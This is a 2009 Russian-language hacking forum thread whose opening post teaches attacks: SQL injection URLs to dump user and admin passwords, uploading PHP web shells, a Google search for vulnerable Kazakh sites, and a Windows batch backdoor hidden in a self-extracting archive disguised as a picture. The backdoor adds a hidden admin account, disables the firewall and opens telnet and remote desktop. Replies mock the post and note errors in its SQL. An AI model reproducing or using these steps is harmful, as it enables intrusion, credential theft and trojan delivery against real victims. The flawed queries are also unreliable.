Описание нескольких методов взлома
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Описание нескольких методов взлома - 2009-08-05 22:04:21.226666
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Здравствуйте.
Сейчас я расскажу о приемах взлома серверов, компьютеров, mail адресов.
Методы взлома сервера:
SQL – injection
Один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.
Атака типа внедрения SQL может быть возможна из-за некорректной обработки входящих данных, используемых в SQL-запросах.
Пример
$id = $_REQUEST['id'];
$res = mysql_query("SELECT * FROM news WHERE id_news = $id");
http://example.org/script.php?id=5
ставим кавычку
http://example.org/script.php?id=5`
Если она не фильтруется то выйдет ошибка:
(Warning: mysql(): supplied argument is not a valid MySQL result resource in)
Далее идет вычисление полей в таблице с помощью параметра ORDER BY
http://example.org/script.php?id=5+ORDER+BY+ предполагаемое количество полей –
Предположим полей 7 из них 3 выводятся на сайте.
http://example.org/script.php?id=-5+ORDER+BY+1,2,3,4,5,6,7–
Выводятся поля 3, 5. Узнаем версию базы MySQL с помощью version()
http://example.org/script.php?id=-5+ORDER+…sion(),4,5,6,7—
На сайте в 3м поле будет написана версия базы. Предположим это 5 версия.
Во всех версиях выше 4 ой есть универсальные таблицы INFORMATION_SCHEMA.TABLES и поле TABLE_NAME.
INFORMATION_SCHEMA.COLUMNS и поле COLUMN_NAME
http://example.org/script.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
Теперь в 3м поле выдут все таблицы которые находятся в базе.
http://example.org/script.php?id=-5+ORDER+…SCHEMA.COLUMNS—
Все колонки находящиеся в таблицах.
Далее находим таблицу например users и поле например user_name, user_pass, user_email, user_mobile, user_address
Составляем запрос
http://example.org/script.php?id=-5+ORDER+…6,7+FROM+users—
И в 3м поле выходит полная информация о пользователе. Параметр user_pass то есть пароль пользователя выйдет в зашифрованном виде (алгаритм md5 чаще всего) 446f9bce9cd9e51771f60b6e9a12108b после расшифровки пароль примет следующий вид предположим 123923993838.
Остальные поля понятны.
То же самое и с таблицей admin, только пароль после расшифровки можно использовать для авторизации к сайту как администратор. Чаще всего админки сайтов лежат по адресу http://example.org/admin/ или /administrator/
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл.( спец php скрипт дающий полный доступ к серверу и хостингу в общем, тое есть если на сервере находиться не один сайт а 50 – 100 то с его помощью можно получить доступ к редактированию всех сайтов и управлении операционной системы сервера) на пример r57shell или c99madshell.
Найти подобную уязвимость на сайтах не трудно нужно всего лишь ввести в google.com
запрос: inurl:news.php?id=5 site:kz Warning: mysql
По запросу выйдет очень много уязвимых сайтов находящихся в Казахстане.
Взлом компьютера.
Есть очень много способов, но я расскажу об универсальном, с его помощью можно будет получить полный доступ к компьютеру вплоть до подключения к рабочему столу.
Для начала создается спец файл и который маскируется под архив и и методом соц. Инженерии “впаривается” через любой доступный метод на компьютер “жертвы”
После того как архив закачен на компьютер и открыт запускается BAT файл который открывает доступ к компьютеру через telnet. Зная IP адрес уязвимой машины можно проникнуть в него и скачать любой файл. При этом вирусная опасность будет нулевая!
Пример
.bat файл
chcp 1251
net user coolz 12333 /add
net localgroup Администраторы coolz /add
net localgroup Administrators coolz /add
net stop sharedaccess
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Создается отдельный пользователь в системе coolz и задается пароль 12333
Далее присваиваются права администратора. И открывается порт 972.
За тем выбираешь файл который нужно “впарить” пусть это будет картинка 1.jpg
Выбирается картинка и пакуется в sfx архив, далее выделяете картинку (1.exe в архиве) и “батник” (1.bat)
нажимаешь добавить в архив. Ставишь галку создать SFX архив потом нажимаешь во вкладку дополнительно и выбираешь пара
метры SFX
Путь для распаковки пишешь: %WinDir%\temp
В окошке выполнять после распаковки
пишем наш архив с картинкой. 1.exe
Заводим во вкладку режимы выбираем скрыть все нажимаем ок
Теперь заходим во вкладку комментарий
И где написано ввести комментарий вручную После строчки SavePath добавляем Setup=cool.bat
Внешний вид
Path=%WinDir%\temp
SavePath
Setup=cool.bat
Setup=1.exe
Silent=1
Нажимаем ОК
Все замаскированный архив с батником готов
То есть после того как открывается архив выполняется бат файл за тем открывается картинка
После подключения к компьютеру можно открыть доступ к удаленному управлению
Для этого в командной строке вводятся следующие параметры
chcp 1251
net localgroup Пользователи удаленного рабочего стола coolz /add
net accounts /maxpwage:unlimited
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "coolz" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start= disabled
sc config tlntsvr start= auto
Все доступ открыт. Подключаемся к компьютеру с помощью Подключение к удаленному рабочему столу.
Водим логин пароль и всё. Загружается рабочий стол уязвимой машины. В дальнейшем можно загрузить сниффер и узнать все пароли. (ICQ, mail адрес и. т. д.)
О взломе ящика скажу коротко.
Есть 3 способа взлома:
1й перебор пароля по словарю
2й использование XSS уязвимости
3й соц.инженерия
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 10:51:36.920000
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
ставим кавычку
http://example.org/sсriрt.php?id=5`
Если она не фильтруется то выйдет ошибка:
а если ошибка не выдастся это будет означать, что инъекции нету? оО
quote:
http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
OMFG! И где же такой запрос выполнится?
Кстать, после "–" надо пробел ставить.
quote:
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл Ничего не напутал?
Где такой бездумный говнокопипаст берете?
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 10:56:31.356666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
))) Похоже это не копипаст но могучий личный опыт
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 13:18:09.756666
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
quote:
http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
OMFG! И где же такой запрос выполнится?
Да ступил конечно ) не ORDER+BY а UNION+SELECT
quote:
Кстать, после "–" надо пробел ставить.
Хм странно но у меня и без пробелов все отлично работает.
quote:
а если ошибка не выдастся это будет означать, что инъекции нету? оО
Не написал) возможно она сляпая
quote:
http://example.org/sсriрt.php?id=-5+ORDER+BY+1,2, TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES—
OMFG! И где же такой запрос выполнится?
Да ступил конечно ) не ORDER+BY а UNION+SELECT
quote:
Кстать, после "–" надо пробел ставить.
Хм странно но у меня и без пробелов все отлично работает.
quote:
а если ошибка не выдастся это будет означать, что инъекции нету? оО
quote:
Не написал) возможно она слепая.
Имея доступ к адмике сайта можно использовать уязвимость типо PHP – injection
То есть залить на сервер шелл
Ничего не напутал?
Честно говоря не понял, что ты имел в виду, хочешь сказать нет?
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 13:22:14.963333
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
Тут почти все рукопись)
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 22:13:11.316666
|
|
|
Оптимизатор
Сообщений: 881
Оценки: 0
Присоединился: 2007-06-23 08:23:03.333333
|
щя лопну от смеха ;)
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 22:22:32.110000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Я такого бреда ещё не читал.
[sm=ak.gif][sm=ak.gif][sm=ak.gif][sm=ak.gif]
|
|
|
|
|
RE: Описание нескольких методов взлома - 2009-08-06 22:31:32.990000
|
|
|
coolziro
Сообщений: 158
Оценки: 0
Присоединился: 2009-02-28 17:51:42.486666
|
quote:
щя лопну от смеха
А ты отойди и лопнись :D :D :D
quote:
Я такого бреда ещё не читал.
По читай на досуге может чему научишься8|
|
|
|
|
|
|
